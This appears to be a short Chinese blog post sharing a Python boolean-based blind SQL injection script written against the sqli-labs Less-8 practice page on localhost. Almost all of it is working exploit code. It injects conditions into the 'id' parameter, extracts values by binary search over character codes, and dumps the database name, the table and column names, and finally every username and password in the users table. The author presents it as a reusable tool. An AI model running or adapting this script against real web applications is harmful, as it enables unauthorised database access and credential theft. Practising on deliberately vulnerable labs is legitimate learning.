GET系盲注脚本

一个小布尔盲注脚本将其中的二分和判断单独分出来了以便修改后可以扩展使用，跟着ai学了一点进度可视化设计

import requests
import binascii
SESSION=requests.Session()
URL="http://localhost/Less-8/"
def to_hex(s):
    return "0x"+binascii.hexlify(s.encode()).decode()
def check(condition):
    payload=f"1' and ({condition})-- "
    try:
        resq=SESSION.get(URL,params={"id":payload},timeout=3)
        return "You are in" in resq.text
    except:
        return False
def binary_search(template,min=0,max=127):
    low=min
    high=max
    while low<=high:
        mid=(low+high)//2
        if check(template.format(mid)):
            low=mid+1
        else:
            high=mid-1
    return low
def get_data(sql_query):
    len_tmp1=f"length(({sql_query}))>{{0}}"
    length=binary_search(len_tmp1,0,100)
    print(f"\r  长度为{length}")
    if length==0: return None
    result=""
    for i in range(1,length+1):
        char_tmp1=f"ascii(substr(({sql_query}),{i},1))>{{0}}"
        char_code=binary_search(char_tmp1,32,126)
        result+=chr(char_code)
        print(f"\r    [>] 提取进度: {result}", end="")
    print("")
    return result
def columns(db_hex,table_name):
    print(f"\n[step4] 获取表 [{table_name}] 的列...")
    table_hex=to_hex(table_name)
    count_sql=f"select count(column_name) from information_schema.columns where table_name={table_hex}"
    count=int(get_data(count_sql))
    columns=[]
    for i in range(count):
        sql=f"select column_name from information_schema.columns where table_name={table_hex} limit {i},1"
        name=get_data(sql)
        columns.append(name)
    print(f"    [√] 列结构: {columns}")
    return columns
def main():
    print("[step1]获取数据库名")
    db_name=get_data("database()")
    print(f"[result]数据库名为: {db_name}")
    if not db_name: return
    db_hex=to_hex(db_name)
    print("[step2]获取表数量")
    count_str=get_data(f"select count(table_name) from information_schema.tables where table_schema={db_hex}")
    if not count_str:
        print("[-] 获取表数量失败")
        return
    table_count=int(count_str)
    print(f"共有{table_count}张表")
    print("[step3]提取表名")
    all_tables=[]
    for i in range(table_count):
        print(f"--- 正在提取第 {i+1}/{table_count} 张表 ---")
        sql=f"select table_name from information_schema.tables where table_schema={db_hex} limit {i},1"
        t_name=get_data(sql)
        all_tables.append(t_name)
    print("\n" + "="*30)
    print("最终脱库结果:")
    for t in all_tables:
        print(f" - {t}")
    print("="*30)
    target_table='users'
    cols=columns(db_hex,target_table)
    sql_user=f"select count(username) from users"
    count_user=int(get_data(sql_user))
    users=[]
    for i in range(count_user):
        u=f"select username from users limit {i},1"
        user=get_data(u)
        users.append(user)
    sql_pwd=f"select count(password) from users"
    count_pwd=int(get_data(sql_pwd))
    pwds=[]
    for i in range(count_pwd):
        p=f"select password from users limit {i},1"
        passw=get_data(p)
        pwds.append(passw)
    return pwds
if __name__=="__main__":
    main()